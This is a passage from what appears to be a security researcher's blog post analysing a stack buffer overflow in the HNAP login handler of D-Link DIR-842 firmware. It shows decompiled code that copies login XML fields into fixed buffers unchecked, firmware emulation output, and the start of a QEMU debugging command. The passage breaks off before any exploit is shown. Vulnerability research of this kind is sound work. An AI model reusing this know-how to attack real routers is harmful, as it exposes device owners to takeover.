border-box;">acStack1484</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack1420</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">68</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack1352</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">Action</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">128</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">Username</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">128</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">Password</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">128</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined</span> <span class="cm-variable" style="box-sizing: border-box;">Captcha</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">128</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined</span> <span class="cm-variable" style="box-sizing: border-box;">auStack776</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">10</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined</span> <span class="cm-variable" style="box-sizing: border-box;">auStack766</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">20</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined</span> <span class="cm-variable" style="box-sizing: border-box;">auStack746</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">98</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack648</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack584</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined</span> <span class="cm-variable" style="box-sizing: border-box;">auStack520</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack456</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack392</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">128</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack264</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">128</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack136</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">128</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">Action</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x80</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">Username</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x80</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">Password</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x80</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">Captcha</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x80</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">auStack776</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x80</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">acStack648</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x40</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">acStack584</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x40</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">auStack520</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x40</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">acStack456</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x40</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">acStack392</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x80</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">memset</span>(<span class="cm-variable" style="box-sizing: border-box;">acStack264</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x80</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">DAT_00433260</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">FUN_0041e620</span>();</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">local_758</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">FUN_004057ec</span>(<span class="cm-variable" style="box-sizing: border-box;">FUN_00419794</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>,<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x10000</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">uVar1</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">FUN_0041edb4</span>(<span class="cm-variable" style="box-sizing: border-box;">DAT_00433260</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">VulnerableCalled</span>(<span class="cm-variable" style="box-sizing: border-box;">uVar1</span>,<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"Action"</span>,<span class="cm-variable" style="box-sizing: border-box;">Action</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">uVar1</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">FUN_0041edb4</span>(<span class="cm-variable" style="box-sizing: border-box;">DAT_00433260</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">VulnerableCalled</span>(<span class="cm-variable" style="box-sizing: border-box;">uVar1</span>,<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"Username"</span>,<span class="cm-variable" style="box-sizing: border-box;">Username</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">uVar1</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">FUN_0041edb4</span>(<span class="cm-variable" style="box-sizing: border-box;">DAT_00433260</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">VulnerableCalled</span>(<span class="cm-variable" style="box-sizing: border-box;">uVar1</span>,<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"LoginPassword"</span>,<span class="cm-variable" style="box-sizing: border-box;">Password</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">uVar1</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">FUN_0041edb4</span>(<span class="cm-variable" style="box-sizing: border-box;">DAT_00433260</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">VulnerableCalled</span>(<span class="cm-variable" style="box-sizing: border-box;">uVar1</span>,<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"Captcha"</span>,<span class="cm-variable" style="box-sizing: border-box;">Captcha</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> . . .</span></span></pre><p cid="n66" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #b8bfc6; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; orphans: 4; overflow-wrap: break-word; position: relative; white-space: pre-wrap;"></p><span style="font-family: helvetica;">The "Action", "Username", "LoginPassword" and "Captcha" XML fields are parsed by the (renamed) "VulnerableXMLParser" method:</span></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n68" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="c" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">void</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">VulnerableXMLParser</span>(<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span><span class="cm-variable" style="box-sizing: border-box;">controllable_input</span>,<span class="cm-variable" style="box-sizing: border-box;">undefined4</span> <span class="cm-variable" style="box-sizing: border-box;">param_2</span>,<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span><span class="cm-variable" style="box-sizing: border-box;">destination_buffer</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">{</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">size_t</span> <span class="cm-variable" style="box-sizing: border-box;">length_param</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span><span class="cm-variable" style="box-sizing: border-box;">p</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span><span class="cm-variable" style="box-sizing: border-box;">pcVar1</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">var_overflow</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1024</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack2060</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1024</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">EOT</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1028</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">sprintf</span>(<span class="cm-variable" style="box-sizing: border-box;">acStack2060</span>,<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"<%s>"</span>,<span class="cm-variable" style="box-sizing: border-box;">param_2</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">sprintf</span>(<span class="cm-variable" style="box-sizing: border-box;">EOT</span>,<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"</%s>"</span>,<span class="cm-variable" style="box-sizing: border-box;">param_2</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">length_param</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">strlen</span>(<span class="cm-variable" style="box-sizing: border-box;">acStack2060</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">p</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">strstr</span>(<span class="cm-variable" style="box-sizing: border-box;">controllable_input</span>,<span class="cm-variable" style="box-sizing: border-box;">acStack2060</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">if</span> (<span class="cm-variable" style="box-sizing: border-box;">p</span> <span class="cm-operator" style="box-sizing: border-box;">!=</span> (<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span>)<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x0</span>) {</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">p</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">p</span> <span class="cm-operator" style="box-sizing: border-box;">+</span> <span class="cm-variable" style="box-sizing: border-box;">length_param</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">pcVar1</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">strstr</span>(<span class="cm-variable" style="box-sizing: border-box;">p</span>,<span class="cm-variable" style="box-sizing: border-box;">EOT</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">if</span> ((<span class="cm-variable" style="box-sizing: border-box;">pcVar1</span> <span class="cm-operator" style="box-sizing: border-box;">!=</span> (<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span>)<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x0</span>) <span class="cm-operator" style="box-sizing: border-box;">&&</span> (<span class="cm-variable" style="box-sizing: border-box;">pcVar1</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">pcVar1</span> <span class="cm-operator" style="box-sizing: border-box;">+</span> <span class="cm-operator" style="box-sizing: border-box;">-</span>(<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">int</span>)<span class="cm-variable" style="box-sizing: border-box;">p</span>, <span class="cm-operator" style="box-sizing: border-box;">-</span><span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1</span> <span class="cm-operator" style="box-sizing: border-box;"><</span> (<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">int</span>)<span class="cm-variable" style="box-sizing: border-box;">pcVar1</span>)) {</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">strlcpy</span>(<span class="cm-variable" style="box-sizing: border-box;">var_overflow</span>,<span class="cm-variable" style="box-sizing: border-box;">p</span>,<span class="cm-variable" style="box-sizing: border-box;">pcVar1</span> <span class="cm-operator" style="box-sizing: border-box;">+</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">var_overflow</span>[(<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">int</span>)<span class="cm-variable" style="box-sizing: border-box;">pcVar1</span>] <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">'\0'</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">strcpy</span>(<span class="cm-variable" style="box-sizing: border-box;">destination_buffer</span>,<span class="cm-variable" style="box-sizing: border-box;">var_overflow</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">return</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">}</span></span></pre><p cid="n69" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #b8bfc6; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; orphans: 4; overflow-wrap: break-word; position: relative; white-space: pre-wrap;"></p><span style="font-family: helvetica;">Here the user-controllable input present in the login parameter tags is copied in an insecure way:</span></div><div><ul style="text-align: left;"><li><span style="font-family: helvetica;">inside a local buffer (i.e. "var_overflow");</span></li><li><span style="font-family: helvetica;">into the 128 byte buffer defined inside the caller function through the "destination_buffer" pointer.</span></li></ul></div><div><span style="font-family: helvetica;"><br /></span><h4 style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; clear: both; line-height: 1.5rem; margin: 0px 0px 1.5rem; orphans: 4; overflow-wrap: break-word; padding: 0px; position: relative; text-align: left;"><span class="md-plain" md-inline="plain" style="background-color: white; box-sizing: border-box; font-family: helvetica; letter-spacing: -1px; white-space: pre-wrap;"><b>Firmware Emulation and Binary </b></span><span style="font-family: helvetica;"><span style="letter-spacing: -1px; white-space: pre-wrap;">Debugging</span></span></h4><span style="font-family: helvetica;">In order to try to exploit the issue we have tried to emulate the firmware. We then used <a href="https://github.com/attify/firmware-analysis-toolkit" target="_blank"><i>FAT</i></a> in order to achieve full system emulation:</span></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n73" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"># ./fat.py ../fwrs/DIR-842_C1_FW300b18.bin </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> __ _</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> / _| | |</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> | |_ __ _ | |_</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> | _| / _` | | __|</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> | | | (_| | | |_</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> |_| \__,_| \__|</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> Welcome to the Firmware Analysis Toolkit - v0.3</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> Offensive IoT Exploitation Training http://bit.do/offensiveiotexploitation</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> By Attify - https://attify.com | @attifyme</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] Firmware: DIR-842_C1_FW300b18.bin</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] Extracting the firmware...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] Image ID: 1</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] Identifying architecture...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] Architecture: mipseb</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] Building QEMU disk image...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] Setting up the network connection, please standby...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] Network interfaces: [('br0', '192.168.0.1'), ('br1', '192.168.7.1')]</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] All set! Press ENTER to run the firmware...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] When running, press Ctrl + A X to terminate qemu</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Creating TAP device tap1_0...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Set 'tap1_0' persistent and owned by uid 0</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Initializing VLAN...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Bringing up TAP device...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">attify123</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Adding route to 192.168.0.1...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Starting firmware emulation... use Ctrl-a + x to exit</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 0.000000] Linux version 2.6.32.70 (vagrant@vagrant-ubuntu-trusty-64) (gcc version 5.3.0 (GCC) ) #1 Thu Feb 18 01:39:21 UTC 2016</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 0.000000] </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 0.000000] LINUX started...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 0.000000] bootconsole [early0] enabled</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 0.000000] CPU revision is: 00019300 (MIPS 24Kc)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 0.000000] FPU revision is: 00739300</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 0.000000] Determined physical RAM map:</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></span></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-1jT-WOTJDLE/YF3_i8DQ_QI/AAAAAAAAAAM/TZ6SwtBI5eA3O4TTcKRdfhw8eNN-EgIIQCLcBGAsYHQ/s1638/dlink.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: helvetica;"><img border="0" data-original-height="626" data-original-width="1638" height="248" src="https://1.bp.blogspot.com/-1jT-WOTJDLE/YF3_i8DQ_QI/AAAAAAAAAAM/TZ6SwtBI5eA3O4TTcKRdfhw8eNN-EgIIQCLcBGAsYHQ/w652-h248/dlink.png" width="652" /></span></a></div><span style="font-family: helvetica;"><br /></span><p cid="n74" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #b8bfc6; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; orphans: 4; overflow-wrap: break-word; position: relative; white-space: pre-wrap;"><span style="font-family: helvetica;"><br /></span></p><span style="font-family: helvetica;"><br />However, we have used the <a href="https://qemu-project.gitlab.io/qemu/user/main.html" target="_blank"><i>QEMU</i></a> user-mode emulation feature with the aim of debugging the issue and creating a working exploit.</span></div><div><span style="font-family: helvetica;"><br />In particular, the following setting was used to emulate a HTTP request to the target <i>mips</i> "hnap" service:</span></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n76" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="bash" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; font-family: helvetica; padding-right: 0.1px;"><span class="cm-builtin" style="box-sizing: border-box; color: #f3b3f8;">sudo</span> <span class="cm-builtin" style="box-sizing: border-box; color: #f3b3f8;">chroot</span> . ./qemu-mips-static <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-E</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">HTTP_SOAPACTION</span><span class="cm-operator" style="box-sizing: border-box;">=</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"http://purenetworks.com/HNAP1/Login"</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-E</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">HTTP_HNAP_AUTH</span><span class="cm-operator" style="box-sizing: border-box;">=</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"69201619B75DDDFF967E6ADD87BA945F 1583432673"</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-E</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">REQUEST_URI</span><span class="cm-operator" style="box-sizing: border-box;">=</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"/HNAP1/"</span> <span class="cm-attribute" style="box-sizing: border-box; color: 